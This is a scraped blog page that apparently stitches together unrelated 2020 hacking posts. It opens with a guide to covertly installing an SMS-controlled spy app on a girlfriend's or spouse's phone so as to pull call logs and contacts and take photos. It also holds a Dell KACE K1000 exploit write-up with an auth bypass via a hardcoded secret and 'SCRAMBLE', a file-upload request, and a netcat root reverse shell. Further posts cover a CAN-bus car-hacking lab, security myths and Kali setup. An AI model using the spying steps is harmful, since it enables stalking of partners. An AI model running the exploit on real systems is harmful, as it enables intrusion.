Friday, May 22, 2020

How To Hack And Trace Any Mobile Phone With A Free Software Remotly

Hello Everyone, Today I am Going To Write a very interesting post for You ..hope you all find this valuable.. :
What is The cost to hire a spy who can able to spy your girlfriend 24X7 days..???? it's around hundreds of dollars Or Sometimes Even Thousands of dollars 🙁
But you are on Hacking-News & Tutorials so everything mentioned here is absolutely free.
would you be happy if I will show you a Secret Mobile Phone trick by which you can Spy and trace your girlfriend, spouse or anyone's mobile phone 24 X 7 which is absolutely free?The only thing you have to do is send an SMS like SENDCALLLOG To get the call history of your girlfriend's phone.isn't it Sounds Cool... 🙂
Without Taking Much Of Your Time…
let's Start The trick…
STEP 1: First of all go to android market from your Girlfriend, spouse, friends or anyone's phone which you want to spy or download the app mentioned below.
STEP 2: Search for an android application named "Touch My life "

STEP 3: download and install that application on that phone.
STEP 4: Trick is Over 🙂
Now you can able to spy that phone anytime by just sending SMS to that phone.
Now give back that phone to your girlfriend.
and whenever you want to spy your girlfriend just send SMS from your phone to your Girlfriend phone Which are mentioned in Touch My Life manage to book.
I am mentioning some handy rules below…
1) Write "CALL ME BACK" without Quotes and Send it to your girlfriend's mobile number for an Automatic call back from your girlfriend's phone to your phone.
2)Write "VIBRATENSEC 30" without Quotes and send it to your girlfriend's mobile number to Vibrate your Girlfriend's Phone for 30 seconds.You can also change Values from 30 to anything for the desired Vibrate time.
3)Write "DEFRINGTONE" without Quotes and Send it to your girlfriend's mobile number..this will play the default ringtone on your girlfriend's phone.
4)Write "SEND PHOTO" without Quotes and Send it to your girlfriend's mobile will take the photo of the current location of your girlfriend and send it to the email address specified in the SMS as an will also send a confirmation message to your number.
5)Write "SENDCALLLOG" without Quotes and Send it to your girlfriend's mobile number will send all the call details like incoming calls, outgoing calls, missed calls to the email address specified in the SMS.
6)Write "SENDCONTACTLIST" without Quotes and Send it to your girlfriend's mobile number will send all the Contact list to the email address specified in the SMS.
So Guys Above all are only some Handy features of touch my life…You can also view more by going to touch my life application and then its manage rules... 🙂
Stay tuned with IemHacker … 🙂

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Thursday, May 21, 2020


Internet speed is the most cared factor when you buy an internet connection. What if still, you face a slow speed browsing problem? No worries, as I came with a solution to this problem. I will let you know how to boost up browsing speed. It's very simple to follow.


There can be many ways you can get a speedy browsing whether you use paid service or free hacks. I am going to share this free speed hack with you.


  1. Navigate to Control Panel > Network and Internet Options > Network and Sharing Center.
  2. Now look for the active internet connection to which you're currently connected to.
  3. Open up Connection Properties of your active connection.
  4. Click on IPv4 and open its Properties.
  5. Here you will notice your DNS, you just need to change your DNS address with the following DNS.
    Preferred DNS server:
    Alternate DNS server:
  6. Once done, save it and no configure it for IPv6. Just change the IPv6 DNS with the following DNS.
    Preferred DNS server: 2620:0:ccc::2

    Alternate DNS server: 2620:0:CCD::2
  7. Finally, save and you're done with it.
That's all. You have successfully learned how to boost up browsing speed. Hope it will work for you. Enjoy speedy internet..!

More information

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance (""). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
; About php.ini   ;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( )
    Ncat: Listening on
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:

Example usage can be seen below:

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MD5 list:


Download. Email me if you need the password.
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Iranian APT Group Targets Governments In Kuwait And Saudi Arabia

Today, cybersecurity researchers shed light on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia. Bitdefender said the intelligence-gathering operations were conducted by Chafer APT (also known as APT39 or Remix Kitten), a threat actor known for its attacks on telecommunication and travel industries in the Middle East to collect personal

via The Hacker News

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Wednesday, May 20, 2020

One Reason Why InfoSec Sucked In The Past 20 Years - The "Security Tips" Myth

From time to time, I get disappointed how much effort and money is put into securing computers, networks, mobile phones, ... and yet in 2016 here we are, where not much has changed on the defensive side. There are many things I personally blame for this situation, and one of them is the security tips.

The goal of these security tips is that if the average user follows these easy to remember rules, their computer will be safe. Unfortunately, by the time people integrate these rules into their daily life, these rules either become outdated, or these rules were so oversimplified that it was never true in the first place. Some of these security tips might sound ridiculous to people in InfoSec nowadays, but this is exactly what people still remember because we told them so for years.

PDF is safe to open

This is an oldie. I think this started at the time of macro viruses. Still, people think opening a PDF from an untrusted source is safer than opening a Word file. For details why this is not true, check:
On an unrelated note, people still believe PDF is integrity protected because the content cannot be changed (compared to a Word document).
Image stolen from Kaspersky

Java is secure

One of the best ones. Oracle started marketing Java as a safe language, where buffer overflows, format strings and pointer-based vulnerabilities are gone. Unfortunately, they forgot to tell the world that instead of "unsafe programs developed by others" they installed their unsafe program on 3 billion devices. 

Stay away from rogue websites and you will be safe

This is a very common belief I hear from average people. "I only visit some trusted news sites and social media, I never visit those shady sites." I have some bad news. At the time of malvertising and infected websites, you don't have to visit those shady sites anymore to get infected.

Don't use open WiFi

I have a very long explanation of why this makes no sense, see here. Actually, the whole recommendation makes no sense as people will connect to public WiFis, no matter what we (InfoSec) recommend.

The password policy nightmare

Actually, this topic has been covered by myself in two blog posts, see here and here. Long story short: use a password manager and 2-factor authentication wherever possible. Let the password manager choose the password for you. And last but not least, corporate password policy sux.

Sites with a padlock are safe

We tell people for years that the communication with HTTPS sites are safe, and you can be sure it is HTTPS by finding a randomly changing padlock icon somewhere next to the URL. What people hear is that sites with padlocks are safe. Whatever that means. The same goes for WiFi - a network with a padlock is safe.

Use Linux, it is free from malware

For years people told to Windows users that only if they would use Linux they won't have so much malware. Thanks to Android, now everyone in the world can enjoy malware on his/her Linux machine.

OSX is free from malware

It is true that there is significantly less malware on OSX than on Windows, but this is an "economical" question rather than a "security" one. The more people use OSX, the better target it will become. Some people even believe they are safe from phishing because they are using a Mac!

Updated AV + firewall makes me 100% safe

There is no such thing as 100% safe, and unfortunately, nowadays most malware is written for PROFIT, which means it can bypass these basic protections for days (or weeks, months, years). The more proactive protection is built into the product, the better!

How to backup data

Although this is one of the most important security tips which is not followed by people, my problem here is not the backup data advise, but how we as a community failed to provide easy to use ways to do that. Now that crypto-ransomware is a real threat to every Windows (and some OSX) users, even those people who have backups on their NAS can find their backups lost. The only hope is that at least OSX has Time Machine which is not targeted yet, and the only backup solution which really works.
The worst part is that we even created NAS devices which can be infected via worms ...

Disconnect your computer from the Internet when not used

There is no need to comment on this. Whoever recommends things like that, clearly has a problem.

Use (free) VPN to protect your anonimity

First of all. There is no such thing as free service. If it is free, you are the service. On another hand, a non-free VPN can introduce new vulnerablities, and they won't protect your anonymity. It replaces one ISP with another (your VPN provider). Even TOR cannot guarantee anonymity by itself, and VPNs are much worse.

The corporate "security tips" myth

"Luckily" these toxic security tips have infected the enterprise environment as well, not just the home users.

Use robots.txt to hide secret information on public websites

It is 2016 and somehow web developers still believe in this nonsense. And this is why this is usually the first to check on a website for penetration testers or attackers.

My password policy is safer than ever

As previously discussed, passwords are bad. Very bad. And they will stick with us for decades ...

Use WAF, IDS, IPS, Nextgen APT detection hibber-gibber and you will be safe

Companies should invest more in people and less into magic blinking devices.

Instead of shipping computers with bloatware, ship computers with exploit protection software
Teach people how to use a password safe
Teach people how to use 2FA
Teach people how to use common-sense


Computer security is complex, hard and the risks change every year. Is this our fault? Probably. But these kinds of security tips won't help us save the world. 

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Hacking All The Cars - Part 1

A step by step lab based mini course on analyzing your car network

I wanted to learn about hacking cars. As usual I searched around the internet and didn't find any comprehensive resources on how to do this, just bits and pieces of the same info over and over which is frustrating. I am not a car hacking expert, I just like to hack stuff. This mini course will run in a fully simulated lab environment available from open garages, which means in 5 minutes from now you can follow along and hack cars without ever bricking your girlfriends car. Since you obviously wouldn't attack your own Lambo, totally use your girlfriends Prius. 

Below are the topics covered in this blog  series so you can decide if you want to read further: 

Whats covered in this car hacking mini course: 

Setting up Virtual Environments for testing
Sniffing CAN Traffic
Parsing CAN Traffic
Reverse Engineering CAN IDs 
Denial of service attacks
Replaying/Injecting Traffic
Coding your own CAN Socket Tools in python
Targeted attacks against your cars components
Transitioning this to attacking a real car with hardware

The first thing we are going to do before we get into any car hacking specifics such as "WTF is CAN?", is get your lab up and running. We are going to run a simple simulated CAN Bus network which controls various features of your simulated car. Its better to learn by doing then sit here and recite a bunch of car network lingo at you and hope you remember it.  

I also don't want you to buy a bunch of hardware and jack into your real car right away. Instead there are options that can get you started hacking cars RIGHT NOW by following along with this tutorial. This will also serve to take away the fear of hacking your actual car by understanding what your doing first. 

Video Playlist: 

Setting up your Lab: 

First things first, set yourself up with an Ubuntu VMware install, and load it up. Optionally you could use a Kali Iinux VM, however, that thing drives me nuts with copy paste issues and I think Kayak was giving me install problems. So support is on you if you would like to use Kali. However, I do know Kali will work fine with OpenGarages virtual car.. So feel free to use it for that if you have it handy and want to get started right away. 

Install PreReq Libraries: 

Once you load this up you are going to want to install CAN utilities and pre-requisite libraries. This is really easy to do with the following Apt-get commands:
sudo apt-get update
sudo apt-get install libsdl2-dev libsdl2-image-dev can-utils  

Then we are going to pull down the ICSimulator repo: 

Starting the simulator: 

Once this is done we can startup the simulator by changing directories to the downloaded repo and running the following 2 commands, which will setup a virtual CAN interface and a simulator GUI Cluster: 

Run the setup Script to get the vcan0 interface up: 
root@kali:~/ICSim# ./ 
root@kali:~/ICSim# ./icsim vcan0

On a new terminal tab we will open up our simulators controller with the following command,
root@kali:~/ICSim#./controls vcan0

Note: that the controller must be the in-focus GUI screen to send keyboard commands to the simulator. 

How to Use the Simulator: 

The simulator has a speedometer with Right and Left turn signals, doors etc.  Below are the list of commands to control the simulator when the Control panel is in focus. Give them each a try and note the changes to the simulator. 
Up and Down keys control the gauges clusters speedometer
Left and Right keys Control the Blinkers
Right Shift + X, A or B open doors 
Left Shift + X, A or be Close doors

Try a few of the above commands for example Right Shift +X and you will see the interface change like so, notice the open door graphic: 

Awesome, thanks to OpenGarages you now you have your very own car to hack

Notice in the setup commands above we used a VCan0 interface. Run Ifconfig and you will now see that you indeed have a new network interface that speaks to the CAN network over VCan0. 

ficti0n@ubuntu:~/Desktop/ICSim$ ifconfig vcan0
vcan0     Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          UP RUNNING NOARP  MTU:16  Metric:1
          RX packets:558904 errors:0 dropped:0 overruns:0 frame:0
          TX packets:558904 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:3663935 (3.6 MB)  TX bytes:3663935 (3.6 MB)

Car networks run on a variety of protocols most prevalent being CAN. You can think of a CAN Bus like an old school networking hub where everyone can see everyone elses traffic. This is true to some extent although you may not see all of the cars traffic if its not connected to that particular bus your plugged into. You can think of CAN traffic kind of like UDP in that its send and forget, the main difference being parts of the CAN bus network don't actually have addresses and everything runs off arbitration IDs and priorities. Thats enough background to get you doing rather then reading.

With a little knowledge out of the way lets check if we can see our CAN traffic from our virtual car via the CanDump utility, which you installed as part of CanUtils package above. Using the following command on the vcan0 interface our simulator uses you can view a stream of traffic: 

ficti0n@ubuntu:~/Desktop/ICSim$ candump vcan0

Above we can see a bunch of CAN frames, and if we perform actions on the vehicle we will see changes to data values in the CanDump output.  However this may happen very fast, and we may not be able to see if for example we unlocked our simulators door. This is because things are changing constantly in the cars IDLE state. One single value changing may not stand out enough for us to take notice or may scroll so fast we cant see it. 

Capture and Replay CAN Actions: 

One option would be to perform an action and replay it, we should see the actions happen again in the replay if the traffic for the action we recorded is on the same bus network our device is plugged into. There are loads of networks within a car and its not guaranteed our network tap for example an OBD2 port plugin is connected to the same network as door we opened.  Or the door may not be connected to the network at all depending on your car and its age or how its configured. 

Replaying dumps with CanPlayer: 
Another useful tool included with CanUtils package is CanPlayer for replaying traffic. If the functionality we are trying to capture is on the same Bus as the adaptor plugged into the car, or in this case our Virtual CAN interface, we can use CanDump to save traffic to a file. We then use CanPlayer to replay the traffic on the network. For example lets run CanDump and open a door and then replay the functionality with CanPlayer. 

Lab 1 Steps: 

  1. Run CanDump
  2. Right Shift + X to open a door
  3. Cancel CanDump (ctrl+c)
  4. Left Shift + X to close the door
  5. Run can player with the saved dump and it will replay the traffic and open the door

Recording the door opening:  (-l for logging) 
ficti0n@ubuntu:~/Desktop/ICSim$ candump -l vcan0

Replaying the CanDump file:  (use the file your can dump created) 
ficti0n@ubuntu:~/Desktop/ICSim$ canplayer -I candump-2018-04-06_154441.log 

Nice, so if all went well you should see that your door is now open again. If this did not happen when attacking a real car, just try to replay it again. CAN networks are not like TCP/IP, they are more like UDP in that you send out your request and its not expecting a response. So if it gets lost then it gets lost and you have to resend. Perhaps something with higher priority on the network was sending at the time of your replay and your traffic was overshadowed by it.   

Interacting with the Can Bus and Reversing Traffic: 

So thats cool, but what about actually understanding what is going on with this traffic, CanDump is not very useful for this, is scrolls by to quickly for us to learn much from.  Instead we can use CanSniffer with colorized output to show us the bytes within packets that change. Below is an example of CanSniffer Traffic: 

To startup can sniffer run the following: 
ficti0n@ubuntu:~/Desktop/ICSim$ cansniffer -c vcan0

You will see 3 fields, Time, ID  and Data. Its pretty easy to figure out what these are based on thier name. The most important part for our usage in this blog are the ID and the Data fields.  

The ID field is the frame ID which is loosely associated with the device on the network which is effected by the frame being sent. The ID to also determines the priority of the frame on the network.  The lower the number of the CAN-ID the higher priority it has on the network and more likely it will be handled first.  The data field is the data being sent to change some parameter like unlocking a door or updating output. You will notice that some of the bytes are highlighted RED. The values in red are the values that are changing during the idle state you are currently in. 

Determine which ID and Byte controls the throttle: 

So with the terminal sniffing window open put the simulator and the controller into the foreground, with the controller being the window you have clicked and selected.  Pay attention to the CanSniffer output while hitting the UP ARROW and look for a value that was white but is now Red and increasing in value as the throttle goes up.  This might take you a few minutes of paying attention to whats going on to see. 

The following 2 pictures show ID 244 in the IDLE state followed by pressing the up button to increase the speed. You will notice a byte has turned red and is increasing in value through a range of HEX values 0-F. It will continue to enumerate through values till it reaches its max speed. 

The byte in ID 244 which is changing is the value while the throttle is engaged, so 244 associated in some way with the increasing speed.   The throttle speed is a good value to start with as it keeps increasing its value when pressed making it easier to spot while viewing the CanSniffer output.  

Singling out Values with Filters: 

If you would like to single out the throttle value then click the terminal window and press -000000 followed by the Enter key which will clear out all of the values scrolling. Then press +244 followed by the Enter key which will add back the throttle ID. You can now click the controller again and increase the speed with your Up arrow button without all the noise clouding your view.  You will instead as shown below only have ID 244 in your output: 

To get back all of the IDs again click the terminal window and input +000000 followed by the Enter key.   Now you should see all of the output as before.  Essentially 000000 means include everything. But when you put a minus in front of it then it negates everything and clears your terminal window filtering out all values. 

Determine Blinker ID: 

Now lets figure out another ID for the blinkers. If you hit the left or right arrow with the controls window selected you will notice a whole new ID appears in the list, ID 188 shown in the picture below which is associated with the blinker. 

This ID was not listed before as it was not in use within the data output until you pressed the blinker control.  Lets single this value out by pressing -000000 followed by +188.  Just like in the throttle example your terminal should only show ID 188, initially it will show with 00 byte values. 

 As you press the left and the right blinker you will see the first Byte change from 00 to 01 or 02. If neither is pressed as in the screenshot above it will be 00. Its kind of hard to have the controller in focus and get a screenshot at the same time but the ID will remain visible as 00 until it times out and disappears from the list when not active. However with it filtered out as above you can get a better view of things and it wont disappear.  

Time for YOU to do some Protocol Reversing:

This lab will give you a good idea how to reverse all of the functionality of the car and associate each action with the proper ID and BYTE. This way you can create a map of intended functionality changes you wish to make.  Above we have done a few walk throughs with you on how to determine which byte and ID is associated with an action. Now its time to map everything out yourself with all the remaining functionality before moving on to attacking individual components.  

Lab Work Suggestion: 

  1. Take out a piece of paper and a pencil
  2. Try unlocking and locking doors and write down the ID which controls this action (remember your filters)
  3. Try unlocking each door and write down the BYTES needed for each door to open
  4. Try locking each doors and what Bytes change and what are their values, write them down
  5. Do the same thing for the blinkers left and right (Might be different then what I did above) 
  6. What ID is the speedometer using?  What byte changes the speed? 

Attacking Functionality Directly: 

With all of the functionality mapped out we can now try to target various devices in the network directly without interacting with the controllers GUI. Maybe we broke into the car via cellular OnStar connection  or the center console units BLE connection which was connected to the CAN network in some way.  
After an exploit we have direct access to the CAN network and we would like to perform actions. Or maybe you have installed a wireless device into an OBD2 port under the dashboard you have remote access to the automobile. 

Using the data from the CAN network reversing lab above we can call these actions directly with the proper CAN-ID and Byte.  Since we are remote to the target we can't just reach over and grab the steering wheel or hit the throttle we will instead send your CAN frame to make the change.
One way we can do this is via the CanSend utility. Lets take our information from our lab above and make the left turn signal flash with the following ID 188 for the turn signal by changing the first byte to 01 indicating the left signal is pressed. CanSend uses the format ID#Data. You will see this below when sending the turn signal via CanSend. 

ficti0n@ubuntu:~/Desktop/ICSim$ cansend vcan0 188#01000000 

You should have noticed that the left signal flashed. If not pay more attention and give it another try or make sure you used the correct ID and changed the correct byte.  So lets do the same thing with the throttle and try to set the speed to something with ID 244 that we determined was the throttle. 

ficti0n@ubuntu:~/Desktop/ICSim$ cansend vcan0 244#00000011F6 

My guess is that nothing happened because its so fast the needle is not going to jump to that value. So instead lets try repeating this over and over again with a bash loop which simply says that while True keep sending the throttle value of 11 which equates to about 30mph: 

ficti0n@ubuntu:~/Desktop/ICSim$ while true; do cansend vcan0 244#00000011F6;  done

Yes thats much better, you may notice the needle jumping back and forth a bit. The reason the needle is bouncing back and forth is because the normal CAN traffic is sent telling the car its actually set to 00 in between your frames saying its 30mph.  But it worked and you have now changed the speed the car sees and you have flashed the blinker without using the cars normal blinker controls. Pretty cool right? 

Monitor the CAN Bus and react to it: 

Another way to handle this issue is to monitor the CAN network and when it sees an ID sent it will automatically send the corresponding ID with a different value.. Lets give that a try to modify our speed output by monitoring for changes. Below we are simply running CanDump and parsing for ID 244 in the log output which is the throttle value that tells the car the speed. When a device in the car reports ID 244 and its value we will immediately resend our own value saying the speed is 30mph with the value 11.  See below command and try this out. 

ficti0n@ubuntu:~/Desktop/ICSim$ candump vcan0 | grep " 244 " | while read line; do cansend vcan0 244#00000011F6; done

With this running after a few seconds you will see the speed adjust to around 30MPH once it captures a legitimate CAN-ID 244 from the network traffic and sends its own value right after.  

Ok cool, so now while the above command is still running click the controller window and start holding down the Up arrow with the controller in focus.. After a few seconds or so when the speed gets above 30MPH you will see the needle fighting for the real higher value and adjusting back to 30MPH as your command keeps sending its on value as a replacement to the real speed. 

So thats one way of monitoring the network and reacting to what you see in a very crude manner.  Maybe someone stole your car and you want to monitor for an open door and if they try to open the door it immediately locks them in. 

Conclusion and whats next: 

I am not an expert car hacker but I hope you enjoyed this. Thats about as far as I want to go into this subject today, in the next blog we will get into how to code python to perform actions on the CAN network to manipulate things in a similar way.  With your own code you are not limited to the functionality of the tools you are provided and can do whatever you want. This is much more powerful then just using the CanUtils pre defined tools. Later on I will also get into the hardware side of things if you would like to try this on a real car where things are more complicated and things can go wrong. 

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  4. Hacking Ético Curso

Kali Linux VM Installation And Setup


From time to time I realize that certain tasks that are trivial for me are not necessarily easy for others, especially if they are just getting started with IT security stuff.

As I am going to be a Facilitator at SANS Munich 2015 on SEC 401, plus we have a few people at work who are just dipping their toe into the wonderful world of Kali Linux, it seemed like a good opportunity to make a short getting started / installation guide on the Kali VMWare VMs that you can download and quickly get started.

On top of that, when I check the statistics of the blog, I always see that the most popular posts are the detailed howtos and tutorials and I assume that it is because there is a need for this kind of posts too, so here it goes! :)

Step -1: Check in your BIOS/UEFI if virtualization is enabled

We are going to use virtualization, so it would be nice to enable it, right?

In BIOS/UEFI menus this is somewhere around "Security" and/or "Virtualization" and it is something like "Intel (R) Virtualization Technology" and "Intel (R) VT-d Feature" that needs to be set to "Enabled".

Step 0: Install VMWare Player or VMWare Workstation

The Kali Linux VMs are VMWare-based, so you need to install VMWare Player (free), VMWare Workstation (paid) or VMWare Fusion (paid, for OS-X).

The more desirable choice is to use VMWare Workstation or VMWare Fusion, as they have a Snapshot feature, while with VMWare Player, you are forced to take a full copy in order to have a sort of rollback feature.

Step 1: Download Kali VM

We need to download the Kali VMs from the "Custom Kali Images" download site, where you can find a 64 bit (amd64) and a 32 bit PAE (i686) too.

There are also Torrent files for the images and based on experience, using Torrent is much more faster and reliable than the HTTP download, so if you can, use that!

Once you have downloaded the VMs, do not forget to check their SHA1 hash!!! On Linux, you can simply use the sha1sum command at a terminal. For Windows, you can use something like the MD5 & SHA Checksum Utility.

Step 2: Change Kali VM default root password

The Kali VM comes with a preset root password, which is "toor" (without the quotes), therefore, it has to be changed.

Here is how you do it:
root@kali:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

Step 3: Change Kali VM default SSH keys

The Kali VM also comes with SSH preinstalled, so we need to change the SSH keys to avoid SSH MiTM attacks.
Here is how you do it:
root@kali:~# cd /etc/ssh/
root@kali:/etc/ssh# mkdir default_kali_keys
root@kali:/etc/ssh# mv ssh_host_* default_kali_keys/
root@kali:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty).

Now we can check if the keys are really changed:

root@kali:/etc/ssh# md5sum /etc/ssh/*key*
md5sum: /etc/ssh/default_kali_keys: Is a directory
6abe210732068fa7ca95854c3078dba5 /etc/ssh/ssh_host_dsa_key
1b5f3c1a1b5c48cc3cce31b116e8b6f8 /etc/ssh/
8f0f60855e5ab8cac8103d64faab090f /etc/ssh/ssh_host_ecdsa_key
aace49ae9236815c9a1672f8ecb2b1e2 /etc/ssh/
cf861a9f743fb4584ab246024465ddf1 /etc/ssh/ssh_host_rsa_key
d5d65d8ad023a6cb1418ae05007bc6d3 /etc/ssh/
root@kali:/etc/ssh# md5sum /etc/ssh/default_kali_keys/*key*
c8d5b82320a4ddde59d0e2b6d9aad42a /etc/ssh/default_kali_keys/ssh_host_dsa_key
6b12ddecd463677cde8097e23d0f219a /etc/ssh/default_kali_keys/
fecf056571a3dfbf3635fc2c50bf23c5 /etc/ssh/default_kali_keys/ssh_host_ecdsa_key
e44b7c50635de42e89b3297414f5047d /etc/ssh/default_kali_keys/
e9e0267484e020878e00a9360b77d845 /etc/ssh/default_kali_keys/ssh_host_rsa_key
ceee93d7bbc9f9b9706e18f23d4e81f1 /etc/ssh/default_kali_keys/

Step 4: Update Kali VM

Next you need to update your Kali VM so that everything is patched.

Here is how you do it:

root@kali:~# apt-get update
Get 1 kali Release.gpg [836 B]
Get:2 kali/updates Release.gpg [836 B]
********************************* SNIP *********************************
Fetched 16.7 MB in 14s (1,190 kB/s)
Reading package lists... Done
root@kali:~# apt-get upgrade
eading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
********************************* SNIP *********************************
The following packages will be upgraded:
********************************* SNIP *********************************
241 upgraded, 0 newly installed, 0 to remove and 16 not upgraded.
Need to get 740 MB of archives.
After this operation, 130 MB disk space will be freed.
Do you want to continue [Y/n]? Y
Get:1 kali/updates/main libc6-i386 amd64 2.13-38+deb7u7 [4,044 kB]
Get:2 kali/main base-files amd64 1:1.1.0 [77.5 kB]
********************************* SNIP *********************************

Step 5: Create a Snapshot/Copy the VM

Once you are done with all the above, you can make a Snapshot in case of VMWare Workstation or copy the files of the VM in case of VMWare Player, so that you can roll back to this clean stat in case you misconfigure something.

Hope this was helpful. Happy hacking!

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